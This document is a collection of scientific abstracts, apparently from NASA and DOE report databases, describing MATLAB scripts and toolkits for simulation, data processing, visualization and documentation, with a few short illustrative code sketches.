MatLab Script and Functional Programming
NASA Technical Reports Server (NTRS)
Shaykhian, Gholam Ali
2007-01-01
MatLab Script and Functional Programming: MatLab is one of the most widely used very high level programming languages for scientific and engineering computations. It is very user-friendly and requires practically no formal programming knowledge. Presented here are MatLab programming aspects, and not just MatLab commands, for scientists and engineers who do not have formal programming training and have no significant time to spare for learning programming to solve their real-world problems. Programs for visualization are specifically provided. The MatLab seminar covers the functional and script programming aspects of the MatLab language. Specific expectations are: a) Recognize MatLab commands, scripts, and functions. b) Create and run a MatLab function. c) Read, recognize, and describe MatLab syntax. d) Recognize decisions, loops, and matrix operators. e) Evaluate scope among multiple files, and among multiple functions within a file. f) Declare, define, and use scalar variables, vectors, and matrices.
NASA Astrophysics Data System (ADS)
Chęciński, Jakub; Frankowski, Marek
2016-10-01
We present MAGE, a tool for fully automated generation of both simulation configuration files (Mif) and Matlab scripts for automated data analysis, dedicated to the Object Oriented Micromagnetic Framework (OOMMF). We introduce an extended graphical user interface (GUI) that allows for fast, error-proof, and easy creation of Mifs, without the programming skills usually required for manual Mif writing. With MAGE we provide OOMMF extensions complementing it with magnetoresistance and spin-transfer-torque calculations, as well as local magnetization data selection for output. Our software allows for the creation of advanced simulation conditions such as simultaneous parameter sweeps and synchronous excitation application. Furthermore, since the output of such simulations can be long and complicated, we provide another GUI allowing for automated creation of Matlab scripts suitable for analysis of such data with Fourier and wavelet transforms as well as user-defined operations.
A Compilation of MATLAB Scripts and Functions for MACGMC Analyses
NASA Technical Reports Server (NTRS)
Murthy, Pappu L. N.; Bednarcyk, Brett A.; Mital, Subodh K.
2017-01-01
The primary aim of the current effort is to provide scripts that automate many of the repetitive pre- and post-processing tasks associated with composite materials analyses using the Micromechanics Analysis Code with the Generalized Method of Cells (MACGMC). This document consists of a compilation of hundreds of scripts that were developed in the MATLAB (The MathWorks, Inc., Natick, MA) programming language and consolidated into 16 MATLAB functions. MACGMC is a composite material and laminate analysis software code developed at NASA Glenn Research Center. The software package has been built around the generalized method of cells (GMC) family of micromechanics theories. The computer code is developed with a user-friendly framework, along with a library of local inelastic, damage, and failure models. Further, application of simulated thermo-mechanical loading, generation of output results, and selection of architectures to represent the composite material have been automated to increase the user friendliness, as well as to make it more robust in terms of input preparation and code execution. Finally, classical lamination theory has been implemented within the software, wherein GMC is used to model the composite material response of each ply. Thus, the full range of GMC composite material capabilities is available for analysis of arbitrary laminate configurations as well. The pre-processing tasks include generation of a multitude of different repeating unit cells (RUCs) for ceramic matrix composites (CMCs) and polymer matrix composites (PMCs), visualization of RUCs from MACGMC input and output files, and generation of the RUC section of a MACGMC input file. The post-processing tasks include visualization of the predicted composite response, such as local stress and strain contours, damage initiation and progression, stress-strain behavior, and fatigue response. In addition to the above, several miscellaneous scripts have been developed that can be used to perform repeated Monte Carlo simulations to enable probabilistic analyses with minimal manual intervention. This document is formatted to provide MATLAB source files and descriptions of how to utilize them. It is assumed that the user has a basic understanding of how MATLAB scripts work and some MATLAB programming experience.
An automated process for generating archival data files from MATLAB figures
NASA Astrophysics Data System (ADS)
Wallace, G. M.; Greenwald, M.; Stillerman, J.
2016-10-01
A new directive from the White House Office of Science and Technology Policy requires that all publications supported by federal funding agencies (e.g. Department of Energy Office of Science, National Science Foundation) include machine-readable datasets for figures and tables. An automated script was developed at the PSFC to make this process easier for authors using the MATLAB plotting environment to create figures. All relevant data (x, y, z, error bars) and metadata (line style, color, symbol shape, labels) are contained within the MATLAB .fig file created when saving a figure. The export_fig script extracts data and metadata from a .fig file and exports it into an HDF5 data file with no additional user input required. Support is included for a number of plot types including 2-D and 3-D line, contour, and surface plots, quiver plots, bar graphs, and histograms. This work was supported by US Department of Energy cooperative agreement DE-FC02-99ER54512 using the Alcator C-Mod tokamak, a DOE Office of Science user facility.
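A minimal sketch of the kind of extraction such a script performs (not the PSFC code itself; the file name and HDF5 dataset paths below are illustrative) might look like the following in MATLAB:

    % Open a saved figure without displaying it and copy its line data into an HDF5 file.
    fig   = openfig('myplot.fig', 'new', 'invisible');
    lines = findobj(fig, 'Type', 'line');               % every line object in the figure
    for k = 1:numel(lines)
        x = get(lines(k), 'XData');
        y = get(lines(k), 'YData');
        dset = sprintf('/line%02d', k);
        h5create('myplot.h5', [dset '/x'], size(x));     % one dataset per coordinate vector
        h5create('myplot.h5', [dset '/y'], size(y));
        h5write('myplot.h5', [dset '/x'], x);
        h5write('myplot.h5', [dset '/y'], y);
    end
    close(fig);

Metadata such as line style, color, and axis labels can be read from the same graphics handles (for example with get(lines(k), 'LineStyle')) and written as HDF5 attributes.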
NASA One-Dimensional Combustor Simulation--User Manual for S1D_ML
NASA Technical Reports Server (NTRS)
Stueber, Thomas J.; Paxson, Daniel E.
2014-01-01
The work presented in this paper is intended to promote research leading to a closed-loop control system to actively suppress thermo-acoustic instabilities. To serve as a model for such a closed-loop control system, a one-dimensional combustor simulation has been written using MATLAB software tools. This MATLAB-based simulation is similar to a precursor one-dimensional combustor simulation that was written in FORTRAN 77 source code. The previous simulation process requires modification of the FORTRAN 77 source code, compiling, and linking when creating a new combustor simulation executable file. The MATLAB-based simulation does not require making changes to the source code, recompiling, or linking. Furthermore, the MATLAB-based simulation can be run from script files within the MATLAB environment or with a compiled copy of the executable file running in the Command Prompt window without requiring a licensed copy of MATLAB. This report presents a general simulation overview. Details regarding how to set up and initiate a simulation are also presented. Finally, the post-processing section describes the two types of files created while running the simulation, and it also includes simulation results for a default simulation included with the source code.
Distributed Acoustic Sensing (DAS) Data for Periodic Hydraulic Tests: Hydraulic Data
Cole, Matthew
2015-07-31
Hydraulic responses from periodic hydraulic tests conducted at the Mirror Lake Fractured Rock Research Site during the summer of 2015. These hydraulic responses were also measured using distributed acoustic sensing (DAS), which is cataloged in a different submission under this grant number. The tests are explained in detail in Matthew Cole's MS thesis, which is cataloged here. This submission contains the injection and drawdown data and the codes used to analyze the data. Sinusoidal Data is a Matlab data file containing a data table for each period-length test. Within each table are columns labeled: time (seconds since beginning of pumping), Inj_m3pm (formation injection in cubic meters per minute), and head for each observation well (meters). The three Matlab script files (*.m) were used to analyze hydraulic responses from the data file above. High-Pass Sinusoid is a routine for filtering the data, computing the FFT, and extracting phase and amplitude values. Borestore is a routine which contains the borehole storage analytic solution and compares modeled amplitude and phase from this solution to computed amplitude and phase from the data. Patsearch Borestore is a routine containing the built-in pattern search optimization method; this minimizes the total error between modeled and actual amplitude and phase in Borestore. Comments within the script files contain more specific instructions for their use.
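As a rough sketch of the phase-and-amplitude extraction step (variable names are assumed here; this is not the actual High-Pass Sinusoid routine), the response at the known forcing period can be pulled from the FFT as follows:

    % h_obs: head record from one observation well (meters); t: matching time vector (seconds);
    % Tforcing: period of the sinusoidal pumping test (seconds). All names are illustrative.
    dt  = t(2) - t(1);                        % sample interval, assuming uniform sampling
    n   = numel(h_obs);
    H   = fft(detrend(h_obs(:)));             % remove the linear trend, transform to frequency domain
    f   = (0:n-1)' / (n*dt);                  % frequency axis in Hz
    [~, k] = min(abs(f - 1/Tforcing));        % bin closest to the forcing frequency
    amp    = 2*abs(H(k))/n;                   % single-sided amplitude of the head response
    phs    = angle(H(k));                     % phase (radians) relative to the start of the record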
NASA Astrophysics Data System (ADS)
Konnik, Mikhail V.; Welsh, James
2012-09-01
Numerical simulators for adaptive optics systems have become an essential tool for the research and development of future advanced astronomical instruments. However, the growing software code of a numerical simulator makes it difficult to continue to support the code itself. The problem of adequate documentation of astronomical software for adaptive optics simulators may complicate development, since the documentation must contain up-to-date schemes and mathematical descriptions implemented in the software code. Although most modern programming environments like MATLAB or Octave have built-in documentation abilities, they are often insufficient for the description of a typical adaptive optics simulator code. This paper describes a general cross-platform framework for the documentation of scientific software using open-source tools such as LaTeX, Mercurial, Doxygen, and Perl. Using a Perl script that translates the MATLAB comments in M-files into C-like syntax, one can use Doxygen to generate and update the documentation for the scientific source code. The documentation generated by this framework contains the current code description with mathematical formulas, images, and bibliographical references. A detailed description of the framework components is presented, as well as guidelines for the framework deployment. Examples of the code documentation for the scripts and functions of a MATLAB-based adaptive optics simulator are provided.
Using the Parallel Computing Toolbox with MATLAB on the Peregrine System
[Truncated web-page excerpt. The recoverable portion shows a MATLAB "Hello World" example that opens a parallel pool, reports how long the pool took to start (fprintf with toc), prints a greeting from each worker inside an spmd ("single program multiple data") block using labindex, and closes the pool with delete(gcp); it is followed by the start of a PBS submission file, helloWorld.sub, containing "#!/bin/bash", "#PBS -l walltime=05:00", "#PBS -l nodes=1", and "#PBS -N" before the text cuts off.]
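A plausible reconstruction of the MATLAB portion of that example (a sketch only, since the opening lines of the script were cut off) is:

    % helloWorld.m -- greet from each worker of a parallel pool
    tic
    parpool;                                              % open the parallel pool
    fprintf('Starting the parallel pool took %g seconds.\n', toc)
    spmd                                                  % "single program multiple data"
        fprintf('Worker %d says Hello World!\n', labindex)
    end
    delete(gcp);                                          % close the parallel pool
    exit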
Bellec, Pierre; Lavoie-Courchesne, Sébastien; Dickinson, Phil; Lerch, Jason P; Zijdenbos, Alex P; Evans, Alan C
2012-01-01
The analysis of neuroimaging databases typically involves a large number of inter-connected steps called a pipeline. The pipeline system for Octave and Matlab (PSOM) is a flexible framework for the implementation of pipelines in the form of Octave or Matlab scripts. PSOM does not introduce new language constructs to specify the steps and structure of the workflow. All steps of analysis are instead described by a regular Matlab data structure, documenting their associated command and options, as well as their input, output, and cleaned-up files. The PSOM execution engine provides a number of automated services: (1) it executes jobs in parallel on a local computing facility as long as the dependencies between jobs allow for it and sufficient resources are available; (2) it generates a comprehensive record of the pipeline stages and the history of execution, which is detailed enough to fully reproduce the analysis; (3) if an analysis is started multiple times, it executes only the parts of the pipeline that need to be reprocessed. PSOM is distributed under an open-source MIT license and can be used without restriction for academic or commercial projects. The package has no external dependencies besides Matlab or Octave, is straightforward to install and supports a variety of operating systems (Linux, Windows, Mac). We ran several benchmark experiments on a public database including 200 subjects, using a pipeline for the preprocessing of functional magnetic resonance images (fMRI). The benchmark results showed that PSOM is a powerful solution for the analysis of large databases using local or distributed computing resources.
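For orientation, a PSOM pipeline is simply a Matlab/Octave structure in which each field describes one job; a minimal sketch (the commands, file names, and option fields shown here are illustrative and should be checked against the PSOM documentation) might look like:

    % Two jobs: the second depends on the first because it reads the first job's output file.
    pipeline.smooth.command    = 'smooth_volume(files_in, files_out, opt);';   % hypothetical command
    pipeline.smooth.files_in   = 'subject01_func.nii';
    pipeline.smooth.files_out  = 'subject01_func_smooth.nii';
    pipeline.smooth.opt.fwhm   = 6;                           % job-specific options

    pipeline.average.command   = 'average_volume(files_in, files_out);';       % hypothetical command
    pipeline.average.files_in  = pipeline.smooth.files_out;   % dependency inferred from the files
    pipeline.average.files_out = 'subject01_func_mean.nii';

    opt_pipe.path_logs = 'logs/';                             % where PSOM keeps its execution record
    psom_run_pipeline(pipeline, opt_pipe);                    % run jobs in parallel where dependencies allow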
Creating and Searching a Local Inventory for Data Granules in a Remote Archive
NASA Astrophysics Data System (ADS)
Cornillon, P. C.
2016-12-01
More often than not, search capabilities for network-accessible data do not exist or do not meet the requirements of the user. For large archives this can make finding data of interest tedious at best. This summer, the author encountered such a problem with regard to the two existing archives of VIIRS L2 sea surface temperature (SST) fields obtained with the new ACSPO retrieval algorithm; one at the Jet Propulsion Laboratory's PO-DAAC and the other at NOAA's National Centers for Environmental Information (NCEI). In both cases the data were available via ftp and OPeNDAP, but there was no search capability at the PO-DAAC and the NCEI archive was incomplete. Furthermore, in order to meet the needs of a broad range of datasets and users, the beta version of the search engine at NCEI was cumbersome for the searches of interest. Although some of these problems have been resolved since (and may be described in other posters/presentations at this meeting), the solution described in this presentation offers the user the ability to develop a search capability for archives lacking one and/or to configure searches more to his or her preferences than the generic searches offered by the data provider. The solution, a Matlab script, used HTML access to the PO-DAAC web site to locate all VIIRS 10-minute granules and OPeNDAP access to acquire the bounding box for each granule from the metadata bound to the file. This task required several hours of wall time to acquire the data and to write the bounding boxes, with the associated ftp and OPeNDAP URLs, to a local file for the 110,000+ granule archive. A second Matlab script searches the local archive, in seconds, for granules falling within a user-defined space-time window, and an ASCII file of the associated wget commands is generated. This file is then executed to acquire the data of interest. The wget commands can be configured to acquire entire files via ftp or a subset of each file via OPeNDAP. Furthermore, the search capability, based on bounding boxes and rectangular regions, could easily be modified to further refine the search. Finally, the script that builds the inventory has been designed to update the local inventory, taking minutes per month rather than hours.
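The second script's core operation amounts to a bounding-box test followed by writing one wget command per matching granule; a sketch (with assumed column names, search-window variables lon0/lon1/lat0/lat1/t0/t1, and file names, none taken from the author's actual code) is:

    % invTbl: local inventory with columns lon_min, lon_max, lat_min, lat_max, start_time, url.
    invTbl   = readtable('viirs_inventory.csv');
    inWindow = invTbl.lon_max >= lon0 & invTbl.lon_min <= lon1 & ...
               invTbl.lat_max >= lat0 & invTbl.lat_min <= lat1 & ...
               invTbl.start_time >= t0 & invTbl.start_time <= t1;
    hits = invTbl(inWindow, :);
    fid  = fopen('get_granules.sh', 'w');
    for k = 1:height(hits)
        fprintf(fid, 'wget %s\n', hits.url{k});        % or an OPeNDAP subset URL instead
    end
    fclose(fid);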
Deterministic modelling and stochastic simulation of biochemical pathways using MATLAB.
Ullah, M; Schmidt, H; Cho, K H; Wolkenhauer, O
2006-03-01
The analysis of complex biochemical networks is conducted within two popular conceptual frameworks for modelling. The deterministic approach requires the solution of ordinary differential equations (ODEs, reaction rate equations) with concentrations as continuous state variables. The stochastic approach involves the simulation of differential-difference equations (chemical master equations, CMEs) with probabilities as variables, generating counts of molecules for chemical species as realisations of random variables drawn from the probability distribution described by the CMEs. Although there are numerous tools available, many of them free, the modelling and simulation environment MATLAB is widely used in the physical and engineering sciences. We describe a collection of MATLAB functions to construct and solve ODEs for deterministic simulation and to implement realisations of CMEs for stochastic simulation using advanced MATLAB coding (Release 14). The program was successfully applied to pathway models from the literature for both cases. The results were compared to implementations using alternative tools for dynamic modelling and simulation of biochemical networks. The aim is to provide a concise set of MATLAB functions that encourage experimentation with systems biology models. All the script files are available from www.sbi.uni-rostock.de/publications_matlab-paper.html.
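As a minimal illustration of the deterministic side (a generic reversible reaction, not one of the pathway models treated in the paper), the reaction rate equations can be integrated with a standard MATLAB solver:

    % A <-> B with forward rate k1 and backward rate k2; the states are concentrations.
    k1 = 1.0;  k2 = 0.5;
    odefun = @(t, c) [ -k1*c(1) + k2*c(2);             % dA/dt
                        k1*c(1) - k2*c(2) ];           % dB/dt
    c0 = [1; 0];                                       % initial concentrations
    [t, c] = ode45(odefun, [0 10], c0);                % solve the reaction rate equations
    plot(t, c); legend('A', 'B'); xlabel('time'); ylabel('concentration');

The stochastic counterpart replaces this with repeated realisations of the chemical master equation, for example via Gillespie's algorithm, producing integer molecule counts rather than continuous concentrations.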
An OpenMI Implementation of a Water Resources System using Simple Script Wrappers
NASA Astrophysics Data System (ADS)
Steward, D. R.; Aistrup, J. A.; Kulcsar, L.; Peterson, J. M.; Welch, S. M.; Andresen, D.; Bernard, E. A.; Staggenborg, S. A.; Bulatewicz, T.
2013-12-01
This team has developed an adaptation of the Open Modelling Interface (OpenMI) that utilizes Simple Script Wrappers. Code is made OpenMI compliant through organization within three modules that initialize, perform time steps, and finalize results. A configuration file is prepared that specifies the variables a model expects to receive as input and those it will make available as output. An example is presented for groundwater, economic, and agricultural production models in the High Plains Aquifer region of Kansas. Our models use the programming environments in Scilab and Matlab, along with legacy Fortran code, and our Simple Script Wrappers can also use Python. These models are collectively run within this interdisciplinary framework from initial conditions into the future. It will be shown that, by applying constraints to one model, the impact of changes on the water resources system may be assessed.
SU-E-J-114: Web-Browser Medical Physics Applications Using HTML5 and Javascript.
Bakhtiari, M
2012-06-01
Since 2010, there has been great attention to HTML5. Application developers and browser makers fully embrace and support the web of the future. Consumers have started to embrace HTML5, especially as more users understand the benefits and potential that HTML5 can mean for the future. Modern browsers such as Firefox, Google Chrome, and Safari are offering better and more robust support for HTML5, CSS3, and JavaScript. The idea is to introduce HTML5 to the medical physics community for open-source software development. The benefit of using HTML5 is the development of portable software systems. The HTML5, CSS, and JavaScript programming languages were used to develop several applications for quality assurance in radiation therapy. The canvas element of HTML5 was used for handling and displaying the images, and JavaScript was used to manipulate the data. Sample applications were developed to: 1. analyze the flatness and symmetry of the radiotherapy fields in a web browser; 2. analyze the Dynalog files from Varian machines; 3. visualize the animated dynamic MLC files; 4. perform simulation via Monte Carlo; and 5. perform interactive image manipulation. The programs showed great performance and speed in uploading the data and displaying the results. The flatness and symmetry program and the Dynalog file analyzer ran in a fraction of a second. One reason behind this performance is the use of the JavaScript language, which is a lower-level programming language in comparison to most scientific programming packages such as Matlab. The second reason is that JavaScript runs locally on client-side computers, not on web servers. HTML5 and JavaScript can be used to develop useful applications that can be run online or offline on different modern web browsers. The programming platform can also be one of the modern web browsers, most of which are open source (such as Firefox). © 2012 American Association of Physicists in Medicine.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Swyer, Michael; Davatzes, Nicholas; Cladouhos, Trenton
Matlab scripts and functions and data used to build Poly3D models and create permeability potential layers for 1) St. Helens Shear Zone, 2) Wind River Valley, and 3) Mount Baker geothermal prospect areas located in Washington state.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Talamo, Alberto; Gohar, Yousry
2016-06-01
This report describes different methodologies to calculate the effective neutron multiplication factor of subcritical assemblies by processing the neutron detector signals using MATLAB scripts. The subcritical assembly can be driven either by a spontaneous fission neutron source (e.g. californium) or by a neutron source generated from the interactions of accelerated particles with target materials. In the latter case, when the particle accelerator operates in a pulsed mode, the signals are typically stored into two files. One file contains the time when neutron reactions occur and the other contains the times when the neutron pulses start. In both files, the time is given by an integer representing the number of time bins since the start of the counting. These signal files are used to construct the neutron count distribution from a single neutron pulse. The built-in functions of MATLAB are used to calculate the effective neutron multiplication factor through the application of the prompt decay fitting or the area method to the neutron count distribution. If the subcritical assembly is driven by a spontaneous fission neutron source, then the effective multiplication factor can be evaluated either using the prompt neutron decay constant obtained from Rossi or Feynman distributions or the Modified Source Multiplication (MSM) method.
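As a rough sketch of the prompt-decay-fitting step (variable names such as counts, tbin, and t_delay are assumed, not taken from the report), the prompt neutron decay constant can be estimated from the exponential tail of the count distribution after a pulse:

    % counts: neutron counts per time bin following a pulse; tbin: bin width in seconds.
    c     = counts(:);
    t     = (0:numel(c)-1)' * tbin;
    tail  = (t > t_delay) & (c > 0);                   % restrict the fit to the prompt-decay region
    p     = polyfit(t(tail), log(c(tail)), 1);         % log-linear fit: log N = log N0 - alpha*t
    alpha = -p(1);                                     % prompt neutron decay constant (1/s)
    % The effective multiplication factor then follows from point-kinetics relations
    % (using beta_eff and the neutron generation time) or from the area method
    % applied to the same count distribution.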
SU-F-T-458: Tracking Trends of TG-142 Parameters Via Analysis of Data Recorded by 2D Chamber Array
DOE Office of Scientific and Technical Information (OSTI.GOV)
Alexandrian, A; Kabat, C; Defoor, D
Purpose: With the increasing QA demands on medical physicists in clinical radiation oncology, the need for an effective method of tracking clinical data has become paramount. A tool was produced which scans through data automatically recorded by a 2D chamber array and extracts relevant information recommended by TG-142. Using this extracted information, a timely and comprehensive analysis of QA parameters can be easily performed, enabling efficient monthly checks on multiple linear accelerators simultaneously. Methods: A PTW STARCHECK chamber array was used to record several months of beam outputs from two Varian 2100 series linear accelerators and a Varian NovalisTx. In conjunction with the chamber array, a beam quality phantom was used simultaneously to determine beam quality. A minimalist GUI was created in MatLab that allows a user to set the file path of the data for each modality to be analyzed. These file paths are recorded to a MatLab structure and then subsequently accessed by a script written in Python (version 3.5.1), which extracts the values required to perform monthly checks as outlined by recommendations from TG-142. The script incorporates calculations to determine if the values recorded by the chamber array fall within an acceptable threshold. Results: Values obtained by the script are written to a spreadsheet where results can be easily viewed, annotated with a "pass" or "fail", and saved for further analysis. In addition to creating a new scheme for reviewing monthly checks, this application makes it possible to succinctly store data for follow-up analysis. Conclusion: By utilizing this tool, parameters recommended by TG-142 for multiple linear accelerators can be rapidly obtained and analyzed, which can be used for evaluation of monthly checks.
Mathematical Formulation used by MATLAB Code to Convert FTIR Interferograms to Calibrated Spectra
DOE Office of Scientific and Technical Information (OSTI.GOV)
Armstrong, Derek Elswick
This report discusses the mathematical procedures used to convert raw interferograms from Fourier transform infrared (FTIR) sensors to calibrated spectra. The work discussed in this report was completed as part of the Helios project at Los Alamos National Laboratory. MATLAB code was developed to convert the raw interferograms to calibrated spectra. The report summarizes the developed MATLAB scripts and functions, along with a description of the mathematical methods used by the code. The first step in working with raw interferograms is to convert them to uncalibrated spectra by applying an apodization function to the raw data and then by performing a Fourier transform. The developed MATLAB code also addresses phase error correction by applying the Mertz method. This report provides documentation for the MATLAB scripts.
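The first of these steps can be sketched in a few lines (illustrative only; the Helios code also applies the Mertz phase correction and a radiometric calibration, which are not shown):

    % igm: raw double-sided interferogram with the zero-path-difference burst near the center (assumed).
    n     = numel(igm);
    apod  = 0.5*(1 + cos(2*pi*((0:n-1)' - (n-1)/2)/(n-1)));   % Hann apodization window centered on the record
    spec  = fft(igm(:) .* apod);                              % Fourier transform of the apodized interferogram
    uncal = abs(spec(1:floor(n/2)));                          % uncalibrated magnitude spectrum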
PMU Data Event Detection: A User Guide for Power Engineers
DOE Office of Scientific and Technical Information (OSTI.GOV)
Allen, A.; Singh, M.; Muljadi, E.
2014-10-01
This user guide is intended to accompany a software package containing a Matrix Laboratory (MATLAB) script and related functions for processing phasor measurement unit (PMU) data. This package and guide have been developed by the National Renewable Energy Laboratory and the University of Texas at Austin. The objective of this data processing exercise is to discover events in the vast quantities of data collected by PMUs. This document attempts to cover some of the theory behind processing the data to isolate events as well as the functioning of the MATLAB scripts. The report describes (1) the algorithms and mathematical background that the accompanying MATLAB codes use to detect events in PMU data and (2) the inputs required from the user and the outputs generated by the scripts.
NASA Astrophysics Data System (ADS)
Duffy, Alan; Yates, Brian; Takacs, Peter
2012-09-01
The Optical Metrology Facility at the Canadian Light Source (CLS) has recently purchased MountainsMap surface analysis software from Digital Surf, and we report here our experiences with this package and its usefulness as a tool for examining metrology data of synchrotron x-ray mirrors. The package has a number of operators that are useful for determining surface roughness and slope error, including compliance with ISO standards (viz. ISO 4287 and ISO 25178). The software is extensible with MATLAB scripts, either by loading an m-file or by a user-written script. This makes it possible to apply a custom operator to measurement data sets. Using this feature we have applied the simple six-line MATLAB code for the direct least-squares fitting of ellipses developed by Fitzgibbon et al. to investigate the residual slope error of elliptical mirrors upon the removal of the best-fit ellipse. The software includes support for many instruments (e.g., Zygo, MicroMap) and can import ASCII data (e.g., LTP data). The stitching module allows the user to assemble overlapping images, and we report on our experiences with this feature applied to MicroMap surface roughness data. The power spectral density function was determined for the stitched and unstitched data and compared.
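For reference, the direct least-squares ellipse fit of Fitzgibbon et al. can be written essentially as follows (a sketch applied to mirror profile coordinates x, y; here the correct eigenvector is selected by checking the ellipse condition 4ac - b^2 > 0 rather than by eigenvalue sign):

    % Fit the conic a*x^2 + b*x*y + c*y^2 + d*x + e*y + f = 0 constrained to be an ellipse.
    x = x(:);  y = y(:);
    D = [x.^2, x.*y, y.^2, x, y, ones(size(x))];        % design matrix
    S = D' * D;                                         % scatter matrix
    C = zeros(6); C(1,3) = 2; C(3,1) = 2; C(2,2) = -1;  % constraint 4ac - b^2 = 1
    [V, E] = eig(S, C);                                 % generalized eigenvalue problem
    lambda = diag(E);
    isEll  = (4*V(1,:).*V(3,:) - V(2,:).^2) > 0;        % which eigenvectors describe an ellipse
    idx    = find(isfinite(lambda(:)') & isEll, 1);
    p      = V(:, idx);                                 % conic coefficients [a b c d e f]

Subtracting the height profile of this best-fit ellipse from the measured profile then yields the residual used for the slope-error analysis.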
GPS Modeling and Analysis. Summary of Research: GPS Satellite Axial Ratio Predictions
NASA Technical Reports Server (NTRS)
Axelrad, Penina; Reeh, Lisa
2002-01-01
This report outlines the algorithms developed at the Colorado Center for Astrodynamics Research to model yaw and predict the axial ratio as measured from a ground station. The algorithms are implemented in a collection of Matlab functions and scripts that read certain user input, such as ground station coordinates, the UTC time, and the desired GPS (Global Positioning System) satellites, and compute the above-mentioned parameters. The position information for the GPS satellites is obtained from Yuma almanac files corresponding to the prescribed date. The results are displayed graphically through time histories and azimuth-elevation plots.
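One of the supporting computations, the azimuth and elevation of a GPS satellite as seen from the ground station, can be sketched generically as follows (assumed variable names; this is not the CCAR code itself):

    % rSat, rSta: ECEF position vectors (meters) of satellite and station;
    % lat, lon:   station geodetic latitude and longitude in radians.
    rho = rSat(:) - rSta(:);                            % line-of-sight vector in ECEF
    R   = [ -sin(lon)           cos(lon)          0;
            -sin(lat)*cos(lon) -sin(lat)*sin(lon) cos(lat);
             cos(lat)*cos(lon)  cos(lat)*sin(lon) sin(lat) ];   % ECEF -> east-north-up rotation
    enu = R * rho;
    az  = atan2(enu(1), enu(2));                        % azimuth, radians east of north
    el  = asin(enu(3) / norm(enu));                     % elevation above the local horizon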
Improve Problem Solving Skills through Adapting Programming Tools
NASA Technical Reports Server (NTRS)
Shaykhian, Linda H.; Shaykhian, Gholam Ali
2007-01-01
There are numerous ways for engineers and students to become better problem-solvers. The use of command-line and visual programming tools can help to model a problem and formulate a solution through visualization. The analysis of problem attributes and constraints provides insight into the scope and complexity of the problem. The visualization aspect of the problem-solving approach tends to make students and engineers more systematic in their thought process and helps them catch errors before proceeding too far in the wrong direction. The problem-solver identifies and defines important terms, variables, rules, and procedures required for solving a problem. Every step required to construct the problem solution can be defined in program commands that produce intermediate output. This paper advocates improved problem-solving skills through using a programming tool. MatLab, created by MathWorks, is an interactive numerical computing environment and programming language. It is a matrix-based system that easily lends itself to matrix manipulation and plotting of functions and data. MatLab can be used as an interactive command line or as a sequence of commands that can be saved in a file as a script or as named functions. Prior programming experience is not required to use MatLab commands. GNU Octave, part of the GNU Project and a free computer program for performing numerical computations, is comparable to MatLab. MatLab visual and command programming are presented here.
NASA Technical Reports Server (NTRS)
Sen, Syamal K.; Shaykhian, Gholam Ali
2011-01-01
MatLab(R) (MATrix LABoratory) is a numerical computation and simulation tool that is used by thousands of scientists and engineers in many countries. MatLab does purely numerical calculations and can be used as a glorified calculator or as an interpreted programming language; its real strength is in matrix manipulations. Computer algebra functionality is achieved within the MatLab environment using the "symbolic" toolbox. This feature is similar to computer algebra programs, provided by Maple or Mathematica, that calculate with mathematical equations using symbolic operations. MatLab in its interpreted programming language form (command interface) is similar to well-known programming languages such as C/C++ and supports data structures and cell arrays to define classes in object-oriented programming. As such, MatLab is equipped with most of the essential constructs of a higher programming language. MatLab is packaged with an editor and debugging functionality useful for performing analysis of large MatLab programs and finding errors. We believe there are many ways to approach real-world problems; prescribed methods to ensure foregoing solutions are incorporated in the design and analysis of data processing and visualization can benefit engineers and scientists in gaining wider insight into the actual implementation of their respective experiments. This presentation will focus on the data processing and visualization aspects of engineering and scientific applications. Specifically, it will discuss methods and techniques to perform intermediate-level data processing covering engineering and scientific problems. MatLab programming techniques will be discussed, including reading various data file formats to produce customized publication-quality graphics, importing engineering and/or scientific data, organizing data in tabular format, exporting data to be used by other software programs such as Microsoft Excel, and data presentation and visualization. The presentation will emphasize creating practical scripts (programs) that extend the basic features of MatLab. Topics include: (1) matrix and vector analysis and manipulations; (2) mathematical functions; (3) symbolic calculations and functions; (4) import/export data files; (5) program logic and flow control; (6) writing functions and passing parameters; (7) test application programs.
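A minimal example of the workflow described, reading a data file, producing a plot, and exporting a table for use in Microsoft Excel (file and column names are illustrative):

    T = readtable('experiment_results.csv');            % import tabular data
    plot(T.time, T.temperature, '-o');                  % visualize one variable against another
    xlabel('Time (s)'); ylabel('Temperature (K)'); grid on;
    print('-dpng', '-r300', 'temperature_vs_time.png'); % export a 300-dpi figure for publication
    writetable(T, 'experiment_results.xlsx');           % export the data to an Excel file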
Case studies on optimization problems in MATLAB and COMSOL multiphysics by means of the livelink
NASA Astrophysics Data System (ADS)
Ozana, Stepan; Pies, Martin; Docekal, Tomas
2016-06-01
LiveLink for COMSOL is a tool that integrates COMSOL Multiphysics with MATLAB to extend one's modeling with scripting in the MATLAB environment. It allows the user to utilize the full power of MATLAB and its toolboxes in preprocessing, model manipulation, and postprocessing. First, the head script launches COMSOL with MATLAB, defines initial values of all parameters, refers to the objective function J described in the objective function file, and creates and runs the defined optimization task. Once the task is launched, the COMSOL model is called in the iteration loop (from the MATLAB environment via the API interface), changing the defined optimization parameters so that the objective function is minimized, using the fmincon function to find a local or global minimum of a constrained linear or nonlinear multivariable function. Once the minimum is found, it returns an exit flag, terminates the optimization, and returns the optimized values of the parameters. The cooperation with MATLAB via LiveLink enhances a powerful computational environment with complex multiphysics simulations. The paper will introduce the use of LiveLink for COMSOL in chosen case studies in the field of technical cybernetics and bioengineering.
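In outline, the iteration loop described above reduces to a standard constrained minimization; the sketch below assumes a helper function runComsolModel (hypothetical) that updates the parameters of the loaded COMSOL model through the LiveLink API, re-solves it, and returns the value of the objective function J:

    p0 = [0.01, 0.5];                  % initial parameter values (illustrative)
    lb = [0.001, 0.1];                 % lower bounds
    ub = [0.10,  1.0];                 % upper bounds
    J  = @(p) runComsolModel(p);       % hypothetical wrapper around the COMSOL model evaluation
    opts = optimoptions('fmincon', 'Display', 'iter');
    [pOpt, Jmin, exitflag] = fmincon(J, p0, [], [], [], [], lb, ub, [], opts);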
Using the Generic Mapping Tools From Within the MATLAB, Octave and Julia Computing Environments
NASA Astrophysics Data System (ADS)
Luis, J. M. F.; Wessel, P.
2016-12-01
